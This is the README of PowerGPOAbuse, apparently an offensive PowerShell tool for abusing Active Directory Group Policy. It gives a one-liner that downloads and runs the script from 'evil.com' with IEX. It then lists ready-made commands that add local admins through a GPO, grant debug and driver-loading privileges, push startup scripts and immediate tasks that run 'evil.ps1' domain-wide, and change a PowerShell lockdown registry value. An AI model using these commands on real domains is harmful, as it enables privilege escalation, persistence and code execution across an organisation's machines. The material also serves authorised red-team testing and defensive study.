PowerGPOAbuse

Powershell version of SharpGPOAbuse for those who can't compile or if their C2 can't execute .NET Assembly straightly from memory. Highly inspired by the original C# version and the amazing PowerView.

Usage

Import the script

• PS> Import-Module .\PowerGPOAbuse.ps1

• PS> . .\PowerGPOAbuse.ps1

• PS> IEX (New-Object System.Net.WebClient).DownloadString('https://evil.com/PowerGPOAbuse.ps1')

Recon

• Those function are designed for exploitation function, but they can be used to quick recon. They not aim to replace PowerView's one.

• List users PS> Get-DomainUser

• List groups PS> Get-DomainGroup

• List GPOs PS> Get-DomainGPO

• List OUs PS> Get-DomainOU

• List DCs PS> Find-DomainController

Exploitation

• Changing GPO status PS> Set-DomainGPOStatus -GPOIdentity "SuperSecureGPO" -Status "AllSettingsDisabled"

• Creating a new GPLink PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"

• Changing the status of a GPLink PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"

• Adding a user to a group PS> Add-GPOGroupMember -Member 'Bobby' -GPOIdentity 'SuperSecureGPO'

• Assign a new right PS> Add-GPOUserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'

• Adding a new Computer/User script PS> Add-GPOStartupScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' -Scope Computer/User

• Create an new Computer/User immediate task PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User

• Adding a new registry key PS> Add-GPORegistryPreference -GPOIdentity SuperSecureGPO -RegistryPath "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -RegistryKey "__PSLockdownPolicy" -RegistryValue "4" -RegistryValueType String -RegistryAction Create

• Create a new GPO PS> New-DomainGPO -DisplayName SuperSecureGPO -Domain testlab.local

• Delete a GPO PS> Remove-DomainGPO -GPOIdentity SuperSecureGPO -RemoveFile

Aliases

• Add-LocalAdmin -> Add-GPOGroupMember

• Add-UserRights -> AddGPOUserRights

• Add-Script -> Add-GPOStartupScript

• Add-Task -> Add-GPOImmediateTask

• Add-RegistryValue -> Add-GPORegistryPreference

Future changes

Reverse functions, Backup Operator weaponization, stability, optimisation and new exploitation functions.

if you find any bugs, idea to improve the script, or any feedback, feel free raise an issue or propose a pull requests !